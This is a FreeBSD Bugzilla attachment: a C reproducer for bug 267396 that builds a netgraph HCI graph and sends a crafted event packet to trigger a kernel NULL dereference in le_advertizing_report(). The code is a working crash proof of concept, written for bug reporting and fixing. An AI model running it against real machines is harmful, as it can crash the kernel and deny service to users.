FreeBSD Bugzilla – Attachment 237685 Details for
Bug 267396
le_advertizing_report() calls NG_HCI_M_PULLUP() without checking for failure
cause a NULL dereference in le_advertizing_report()
ng36a.c (text/plain), 3.07 KB, created by
Robert Morris
on 2022-10-27 17:13:05 UTC
Description:
cause a NULL dereference in le_advertizing_report()
Filename:
MIME Type:
Creator:
Robert Morris
Created:
2022-10-27 17:13:05 UTC
Size:
3.07 KB
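/*
 * Reproducer attached to FreeBSD bug 267396: le_advertizing_report() calls
 * NG_HCI_M_PULLUP() without checking for failure. Per the attachment
 * description, the result is a NULL dereference in le_advertizing_report().
 *
 * The program wires up a small netgraph graph in which this process holds
 * the peer end of the hci node's "drv", "acl" and "sco" hooks, then sends
 * one 256-byte HCI event packet into the "drv" side.
 *
 * It loads kernel modules and talks to netgraph directly, so it is meant
 * for a disposable test machine. Kernel-side remedy named in the bug title:
 * test the mbuf pointer after NG_HCI_M_PULLUP() before using it.
 */
#include <stdio.h>
#include <string.h>
#include <stdlib.h>
#include <unistd.h>
#include <sys/socket.h>
#include <sys/ioctl.h>
#include <netinet/in.h>
#include <sys/wait.h>
#include <sys/resource.h>
#include <arpa/inet.h>
#include <assert.h>
#include <ctype.h>
#include <fcntl.h>
#include <signal.h>
#include <netgraph.h>
#include <netgraph/ng_message.h>
#include <netgraph/ng_socket.h>
#include <netgraph/bluetooth/include/ng_hci.h>

/*
 * XOR masks, one per 8-byte word of the outgoing packet. The packet buffer
 * is pre-filled with 0xff, so a zero mask leaves its eight bytes as 0xff.
 */
unsigned long long aa[] = {
	0x7ffd00c100ull,
	0x60bf00000000ull,
	0x0ull,
	0x0ull,
	0x0ull,
	0x0ull,
	0x0ull,
	0x0ull,
	0x0ull,
	0x0ull,
	0x0ull,
	0x0ull,
	0x0ull,
	0x0ull,
	0x0ull,
	0x0ull,
	0x0ull,
	0x0ull,
	0x0ull,
	0x0ull,
	0x0ull,
	0xfe00000000000000ull,
	0xcebf0000000000ull,
	0x0ull,
	0x0ull,
	0x0ull,
	0x0ull,
	0x0ull,
	0x0ull,
	0x0ull,
	0xf340ull,
	0x0ull,
};

/* Index of the next unused entry in aa[]. */
int aai;

/* The packet loop below advances in 8-byte steps, one aa[] entry each. */
_Static_assert(sizeof(unsigned long long) == 8,
    "packet words are expected to be 8 bytes");

int
main(void)
{
	/* Make sure the netgraph pieces used below are present in the kernel. */
	system("kldload netgraph");
	system("kldload ng_btsocket");
	system("kldload ng_hci");

	int cs = -1;
	int ds = -1;

	/*
	 * Without a socket node every later call would run on fd -1, so stop
	 * here instead of producing a run of misleading follow-on errors.
	 */
	if (NgMkSockNode(NULL, &cs, &ds) < 0) {
		perror("NgMkSockNode");
		exit(1);
	}

	/* Create an hci node; our hook "xdrv" attaches to its "drv" hook. */
	struct ngm_mkpeer mkp;
	memset(&mkp, 0, sizeof(mkp));
	strcpy(mkp.type, "hci");
	strcpy(mkp.ourhook, "xdrv");
	strcpy(mkp.peerhook, "drv");

	if (NgSendMsg(cs, ".:", NGM_GENERIC_COOKIE,
	    NGM_MKPEER, &mkp, sizeof(mkp)) < 0) {
		fprintf(stderr, "netgraph mkpeer %s %s failed\n", mkp.type, mkp.peerhook);
	}

	/* Name the new node "hci0"; later steps address it by that name. */
	struct ngm_name name;
	memset(&name, 0, sizeof(name));
	strcpy(name.name, "hci0");
	if (NgSendMsg(cs, ".:xdrv", NGM_GENERIC_COOKIE,
	    NGM_NAME, &name, sizeof(name)) < 0) {
		perror("NgSendMsg NGM_NAME");
		exit(1);
	}

	/* Attach our "xacl" hook to the hci node's "acl" hook. */
	struct ngm_connect con;
	memset(&con, 0, sizeof(con));
	strcpy(con.path, ".:xdrv");
	strcpy(con.ourhook, "xacl");
	strcpy(con.peerhook, "acl");

	if (NgSendMsg(cs, ".:", NGM_GENERIC_COOKIE,
	    NGM_CONNECT, &con, sizeof(con)) < 0) {
		fprintf(stderr, "netgraph connect %s %s %s failed\n", con.path, con.ourhook, con.peerhook);
	}

	/* Attach our "xsco" hook to the hci node's "sco" hook. */
	memset(&con, 0, sizeof(con));
	strcpy(con.path, ".:xdrv");
	strcpy(con.ourhook, "xsco");
	strcpy(con.peerhook, "sco");

	if (NgSendMsg(cs, ".:", NGM_GENERIC_COOKIE,
	    NGM_CONNECT, &con, sizeof(con)) < 0) {
		fprintf(stderr, "netgraph connect %s %s %s failed\n", con.path, con.ourhook, con.peerhook);
	}

	/* Connect hci0's "raw" hook to the "raw" hook of btsock_hci_raw. */
	memset(&con, 0, sizeof(con));
	strcpy(con.path, "btsock_hci_raw:");
	strcpy(con.ourhook, "raw");
	strcpy(con.peerhook, "raw");

	if (NgSendMsg(cs, "hci0:", NGM_GENERIC_COOKIE,
	    NGM_CONNECT, &con, sizeof(con)) < 0) {
		fprintf(stderr, "netgraph connect %s %s %s failed\n", con.path, con.ourhook, con.peerhook);
	}

	/*
	 * Start an inquiry in the background and wait for one packet on the
	 * data socket. Presumably this is the command the hci node forwards
	 * to the hooks this process holds -- TODO confirm.
	 */
	system("hccontrol inquiry &");

	{
		char reply[2048];
		char hook[128];
		hook[0] = '\0';
		int x = NgRecvData(ds, (void *)reply, sizeof(reply), hook);
		if (x <= 0) {
			perror("NgRecvData");
			exit(1);
		}
		printf("NgRecvData -> %s %d\n", hook, x);
		for (int i = 0; i < x; i++)
			printf("%02x ", reply[i] & 0xff);
		printf("\n");
	}

	/*
	 * Build the packet: 0xff fill, then XOR each 8-byte word with the next
	 * aa[] entry. memcpy is used for the word access because buf is a char
	 * array with no alignment guarantee for long long; the resulting bytes
	 * are the same as a direct word access would give.
	 */
	char buf[256];
	memset(buf, 0xff, sizeof(buf));
	for (size_t off = 0; off + 8 <= sizeof(buf); off += 8) {
		unsigned long long word;

		/* Never read past the end of the mask table. */
		if ((size_t)aai >= sizeof(aa) / sizeof(aa[0]))
			break;
		memcpy(&word, buf + off, sizeof(word));
		word ^= aa[aai++];
		memcpy(buf + off, &word, sizeof(word));
	}

	/* Mark the buffer as an HCI event packet and send it on "xdrv". */
	buf[0] = NG_HCI_EVENT_PKT;
	if (NgSendData(ds, "xdrv", (unsigned char *)buf, sizeof(buf)) < 0) {
		perror("NgSendData");
		exit(1);
	}

	/* Presumably leaves time for the packet to be processed before exit. */
	sleep(1);
	return 0;
}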